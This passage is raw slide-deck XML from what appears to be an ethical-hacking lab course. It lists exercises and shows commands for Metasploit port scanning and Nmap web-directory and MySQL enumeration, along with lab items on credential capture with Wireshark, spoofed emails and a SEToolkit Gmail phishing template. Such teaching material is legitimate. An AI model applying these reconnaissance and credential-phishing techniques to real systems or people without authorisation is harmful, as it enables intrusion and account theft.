                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="B42419"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>scanner/portscan/tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) &gt; set ports 1-100</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ports =&gt; 1-100</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n" sz="1800" b="0" i="0" u="sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>msf6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="B42419"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>scanner/portscan/tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) &gt; run</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1038" name="Google Shape;1038;p152"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021144" y="3064594"/>
            <a:ext cx="7101713" cy="172711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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="33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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540631" y="197231"/>
            <a:ext cx="71619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sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Enumerates Directories Used by Web Servers</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1050" name="Google Shape;1050;p154"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1322269"/>
            <a:ext cx="6244032" cy="3821231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1051" name="Google Shape;1051;p154"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452381" y="1273744"/>
            <a:ext cx="2403300" cy="4051200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="68575" rIns="68575" bIns="68575" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The http-enum.nse script enumerates directories used by popular web applications and servers.</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Here's an example of how to use the http-enum.nse script:</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEEEE"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>nmap --script=http-enum &lt;target</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consola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55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540631" y="197231"/>
            <a:ext cx="71619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sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Enumerates MySQL Info</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p155"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452381" y="1273744"/>
            <a:ext cx="2597100" cy="4228200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="68575" rIns="68575" bIns="68575" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The mysql-info.nse script enumerates features of my sql.</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4F58"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Here's an example of how to use the mysql-info.nse script:</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEEEE"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>nmap -p 3306 --script=mysql-info &lt;target</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="4B4F58"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Note: 5432 for postgresql, script is pgsql-brute </a:t>
            </a:r>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="76200" marR="76200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="4B4F58"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EEEEEE"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p155"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="861300"/>
            <a:ext cx="5841976" cy="418730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56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="381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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform information gathering about any website using ping, nslookpup, dnslookup, ip-neighbors, website-informer, Email and WHOIS.  </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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157"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147438" y="439836"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Know IP Address of any website: Ping</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;p157"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645913"/>
            <a:ext cx="5563200" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Terminal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Mac, Press Command+Space, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="93333"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Type Terminal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
